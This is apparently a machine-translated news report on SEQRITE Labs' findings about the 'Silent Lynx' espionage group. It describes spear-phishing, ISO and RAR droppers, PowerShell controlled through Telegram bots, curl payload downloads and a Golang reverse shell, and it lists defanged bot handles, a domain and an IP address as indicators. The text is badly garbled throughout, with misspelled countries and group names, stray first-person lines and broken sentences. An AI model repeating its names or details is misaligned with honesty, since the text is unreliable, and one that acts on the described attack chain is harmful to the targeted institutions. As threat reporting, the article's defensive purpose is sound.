Prior to the Silent Links, a threatening actor that has not been documented before is linked to cyber attacks for various entities of Kyrgyystan and Turkmenistan.
“This threat group was previously targeted at the East Europe and Central Asian government’s think tanks for economic decision -making and entity involved in bank sector,” said Subhajeet Singha, a researcher in SEQRITE LABS, which was announced last month. I mentioned in the report.
Hacking Group’s attacks include embassy, lawyers, government -supported banks and think tanks. This activity is due to a threat actor of Kazakhstan Origin with moderate confidence.
The infection begins with a spear fishing email that contains a RAR archive attachment that ultimately functions as a malicious payload delivery means that allows remote access to the infringed host.
The first campaign of the two campaigns detected by cyber security companies on December 27, 2024 will launch an ISO file including malicious C ++ binaries and decoy PDF files. After that, the executable file executes a PowerShell script that uses the telegram bot (“@south_korea145_bot” and “@south_afr_angl_bot”) for the command execution and the data XFILTRATION.
Part of the command executed via the bot contains a CURL command that downloads and saves additional payloads from the remote server (“Pweobmxdlboi)[.]com “) or Google drive.
In contrast, another campaign adopts a malicious RAR archive that contains two files. Decoy PDF and Golang executable files are designed to establish a reverse shell on the attacker control server (“185.122.171)[.]22: 8082 “).
Seqrite Labs is observed a certain tactical duplication between threat actors and Yoro -Troopers (aka SturgeonPhisser), which are associated with attacks targeting independent countries (CIS) using PowerShell and Golang tools. I stated.
“The Silent Lynx campaign shows a sophisticated multi -stage attack strategy using ISO files, C ++ loaders, PowerShell scripts, and Golang implants,” says SINGHA.
“These, combined with the dependence on the telegrambot for commands and the control, and the deceidocuments and regional targets, focus on spy activities in Central Asia and Specia.”
Source link
